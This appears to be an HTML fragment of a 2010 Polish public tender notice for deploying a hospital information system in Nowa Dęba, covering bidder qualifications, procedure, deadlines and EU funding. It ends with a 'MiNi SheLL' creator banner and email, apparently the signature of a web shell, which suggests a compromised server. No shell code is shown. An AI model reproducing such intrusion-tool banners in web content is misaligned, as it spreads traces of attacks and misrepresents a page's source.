        -  minimum 2-ch  specjalistów w zakresie wdrażania systemów informatycznych szpitala w zakresie  
częsci administracyjnej  i medycznej:
            Nie mniej niż dwuletnie doświadczenie we wdrożeniach w Zakładach Opieki Zdrowotnej, udział w 
            minimum 1 projekcie wdrożenia na stanowisku wdrożeniowca dla ZOZ, certyfikat z metodyki 
            zarządzania projektami IMPA na poziomie co najmniej Project Coordinator lub  równoważny jak 
            poniżej  wyszczególniony w tabeli:




Wystawca 	         IPMA	         PMI 	        APMG
Skrócona nazwa	IPMA-D	CAPM	Prince2 Foundation

Pełna nazwa certyfikatu	IPMA Level D:
Certified Project
Management Associate	Certified Associate in  Project  Management 	Prince2 Foundation
Tytuł	Project  Coordinator	Project Coordinator	Project Coordinator

            Do oferty należy dołączyć odpowiednie dokumenty potwierdzajace posiadanie wymaganych    
            kwalifikacji.
  j/ Oświadczenie biegłego rewidenta, potwierdzającego że oferowane aplikacje są zgodne z Ustawą o      
      rachunkowości (Dz. U. z 2010 r.: Nr 47, poz. 278);
  k/ Oświadczenie Wykonawcy, że dostarczy Zamawiającemu bezterminowe licencje na sieciowe użytkowanie 
      wdrożonego oprogramowania aplikacyjnego dla liczby użytkowników zgodnej z opisem przedmiotu 
      zamówienia.
          l/  Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zkładów Opieki Zdrowotnej 39-460 Nowa Dęba,ul.M.C.Skłodowskiej 1A;osob.w pokoju nr:111; za zalicz.poczt. przesył.wniosek fax z adresem i nr NIP.Cena SIWZ 20,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zkładów Opieki Zdrowotnej 
39-460 Nowa Dęba,ul.M.C.Skłodowskiej 1A - Sekretariat pok.nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia zostanie zrealizowany zgodnie z projektem Podkarpacki System Informacji Medycznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com